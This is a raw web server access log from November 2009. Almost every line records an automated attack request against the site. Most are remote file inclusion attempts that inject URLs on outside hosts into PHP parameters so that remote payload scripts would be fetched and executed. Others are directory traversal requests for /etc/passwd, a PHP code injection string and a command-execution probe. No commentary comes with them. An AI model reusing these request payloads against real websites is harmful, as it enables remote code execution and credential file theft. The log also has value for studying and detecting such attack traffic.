66.148.120.132 - - [12/Nov/2009:07:30:50 -0600] "GET /logs/access_log.1243900800/?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:56 -0600] "GET /logs/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:31:19 -0600] "GET /logs/access_log.1230768000//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:31:19 -0600] "GET //tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:31:20 -0600] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:31:29 -0600] "GET /?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:31:32 -0600] "GET /logs/access_log.1242864000/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:31:52 -0600] "GET /logs/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
65.55.106.208 - - [12/Nov/2009:07:31:54 -0600] "GET /logs/access_log.1134950400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.148.120.132 - - [12/Nov/2009:07:32:10 -0600] "GET /logs/access_log.1243900800/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:32:20 -0600] "GET /logs/access_log.1229299200//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:07:32:25 -0600] "GET //appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:07:32:25 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:07:32:25 -0600] "GET /logs/access_log.1231200000//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.79.101.98 - - [12/Nov/2009:07:32:25 -0600] "GET /logs/access_log.1237766400//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:33:33 -0600] "GET /logs//calogic/reconfig.php?GLOBALS[CLPath]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:33:33 -0600] "GET //calogic/reconfig.php?GLOBALS[CLPath]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:33:33 -0600] "GET /logs/access_log.1242691200//calogic/reconfig.php?GLOBALS[CLPath]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:33:34 -0600] "GET /logs/access_log.1238112000//calogic/reconfig.php?GLOBALS[CLPath]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:34:37 -0600] "GET /logs/access_log.1243900800/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:12 -0600] "GET /logs/access_log.1243900800/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:13 -0600] "GET /?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:13 -0600] "GET /logs/access_log.1243900800/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:18 -0600] "GET /logs/access_log.1243900800/?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:27 -0600] "GET /logs/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
151.8.79.19 - - [12/Nov/2009:07:35:28 -0600] "GET //eshow.php?Config_rootdir=http://qqe.ru/forum/Packages/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
151.8.79.19 - - [12/Nov/2009:07:35:28 -0600] "GET /logs//eshow.php?Config_rootdir=http://qqe.ru/forum/Packages/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
151.8.79.19 - - [12/Nov/2009:07:35:28 -0600] "GET /logs/access_log.1238112000//eshow.php?Config_rootdir=http://qqe.ru/forum/Packages/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
151.8.79.19 - - [12/Nov/2009:07:35:28 -0600] "GET /logs/access_log.1240876800//eshow.php?Config_rootdir=http://qqe.ru/forum/Packages/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:35:31 -0600] "GET //claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:35:31 -0600] "GET /logs/access_log.1238112000//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:35:31 -0600] "GET /logs//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:35:35 -0600] "GET /logs/access_log.1249689600//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:35:47 -0600] "GET /logs/access_log.1243900800/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:36:06 -0600] "GET /logs/access_log.1238112000//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:36:06 -0600] "GET //claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:36:06 -0600] "GET /logs//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:36:06 -0600] "GET /logs/access_log.1252281600//claroline/auth/ldap/authldap.php?includePath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
209.97.212.185 - - [12/Nov/2009:07:39:07 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.97.212.185 - - [12/Nov/2009:07:39:07 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
209.97.212.185 - - [12/Nov/2009:07:39:07 -0600] "GET /logs/access_log.1241654400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.97.212.185 - - [12/Nov/2009:07:39:07 -0600] "GET /logs/access_log.1251504000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:39:34 -0600] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:39:34 -0600] "GET /logs/access_log.1253491200//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:39:34 -0600] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:39:35 -0600] "GET /logs/access_log.1249948800//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:07:39:49 -0600] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:07:39:49 -0600] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:07:39:49 -0600] "GET /logs/access_log.1249516800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:07:39:54 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:07:39:54 -0600] "GET /logs/access_log.1250553600/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:07:39:54 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:41:50 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:41:50 -0600] "GET /logs/access_log.1250553600/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:41:50 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:07:42:02 -0600] "GET /logs/access_log.1253664000/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:42:30 -0600] "GET /logs/access_log.1253836800/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:42:31 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:42:31 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /logs/access_log.1253836800/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:07:42:51 -0600] "GET /logs/access_log.1253836800/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:44:16 -0600] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:44:16 -0600] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:44:17 -0600] "GET /logs/access_log.1230422400///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:44:23 -0600] "GET //forum/search.php?do=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:44:23 -0600] "GET /logs//forum/search.php?do=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:44:23 -0600] "GET /logs/access_log.1245715200//forum/search.php?do=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:44:24 -0600] "GET /logs/access_log.1253664000/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:44:30 -0600] "GET /logs/access_log.1233878400///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:44:46 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:44:47 -0600] "GET /logs/access_log.1250553600/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:07:44:47 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:44:47 -0600] "GET /logs/access_log.1231891200///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:45:19 -0600] "GET /skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:45:19 -0600] "GET /logs/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:07:45:19 -0600] "GET /logs/access_log.1253836800/skin/gallery/write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:45:47 -0600] "GET /logs/access_log.1244678400//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:45:47 -0600] "GET //portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:45:47 -0600] "GET /logs//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:45:47 -0600] "GET /logs/access_log.1251072000//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:46:03 -0600] "GET //portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:46:03 -0600] "GET /logs/access_log.1244678400//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:46:03 -0600] "GET /logs/access_log.1251072000//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:46:03 -0600] "GET /logs//portal/modules/smartfaq/faq.php?faqid=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:46:37 -0600] "GET /logs/access_log.1254441600//forum/search.php?do=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:47:20 -0600] "GET /modules/newbb/viewtopic.php?viewmode=flat&topic_id=812&forum=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:47:20 -0600] "GET /logs/access_log.1236643200/modules/newbb/viewtopic.php?viewmode=flat&topic_id=812&forum=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:47:20 -0600] "GET /logs/modules/newbb/viewtopic.php?viewmode=flat&topic_id=812&forum=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:48:00 -0600] "GET /logs/access_log.1251504000/modules/newbb/viewtopic.php?viewmode=flat&topic_id=812&forum=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:48:33 -0600] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:48:34 -0600] "GET /logs/access_log.1250380800//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:48:34 -0600] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
117.58.251.130 - - [12/Nov/2009:07:49:10 -0600] "GET /logs/index.php?principal=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:07:49:10 -0600] "GET /index.php?principal=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [12/Nov/2009:07:49:10 -0600] "GET /logs/index.php?principal=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:07:49:10 -0600] "GET /index.php?principal=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
122.200.64.9 - - [12/Nov/2009:07:50:14 -0600] "GET /logs///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.200.64.9 - - [12/Nov/2009:07:50:14 -0600] "GET ///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.200.64.9 - - [12/Nov/2009:07:50:14 -0600] "GET /logs/access_log.1248393600///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
122.200.64.9 - - [12/Nov/2009:07:50:51 -0600] "GET ///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.200.64.9 - - [12/Nov/2009:07:50:51 -0600] "GET /logs/access_log.1248393600///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
122.200.64.9 - - [12/Nov/2009:07:50:51 -0600] "GET /logs///skin/doorsClass/write.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
74.213.177.58 - - [12/Nov/2009:07:51:37 -0600] "GET /?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
74.213.177.58 - - [12/Nov/2009:07:51:41 -0600] "GET /logs/?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 212466 "-""libwww-perl/5.805"
70.38.112.174 - - [12/Nov/2009:07:53:21 -0600] "GET //sphider/admin/configset.php?settings_dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:53:21 -0600] "GET /logs/access_log.1237248000//sphider/admin/configset.php?settings_dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:53:21 -0600] "GET /logs//sphider/admin/configset.php?settings_dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:07:53:21 -0600] "GET /logs/access_log.1233792000//sphider/admin/configset.php?settings_dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
219.166.240.66 - - [12/Nov/2009:07:54:13 -0600] "GET /?reflect_base=http://204.3.167.134/mpc/docs/styles/.www.www.www/.albania.albania.albania/echo?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 200 3245 "-""-"
219.166.240.66 - - [12/Nov/2009:07:54:15 -0600] "GET /logs/?reflect_base=http://204.3.167.134/mpc/docs/styles/.www.www.www/.albania.albania.albania/echo?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 200 212466 "-""-"
93.174.0.17 - - [12/Nov/2009:07:54:41 -0600] "GET /logs/access_log.1230076800//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:54:41 -0600] "GET //modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:54:42 -0600] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:20 -0600] "GET /logs/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:20 -0600] "GET /logs/access_log.1249171200/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:20 -0600] "GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:22 -0600] "GET /logs/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:22 -0600] "GET /logs/access_log.1249171200/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:22 -0600] "GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:22 -0600] "GET /logs/access_log.1248134400/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:55:43 -0600] "GET /logs/access_log.1248134400/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:56:11 -0600] "GET /logs/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:56:11 -0600] "GET /logs/access_log.1249171200/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:56:11 -0600] "GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:56:29 -0600] "GET /logs/access_log.1248134400/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:56:56 -0600] "GET /logs/access_log.1233792000//admin/configset.php?settings_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
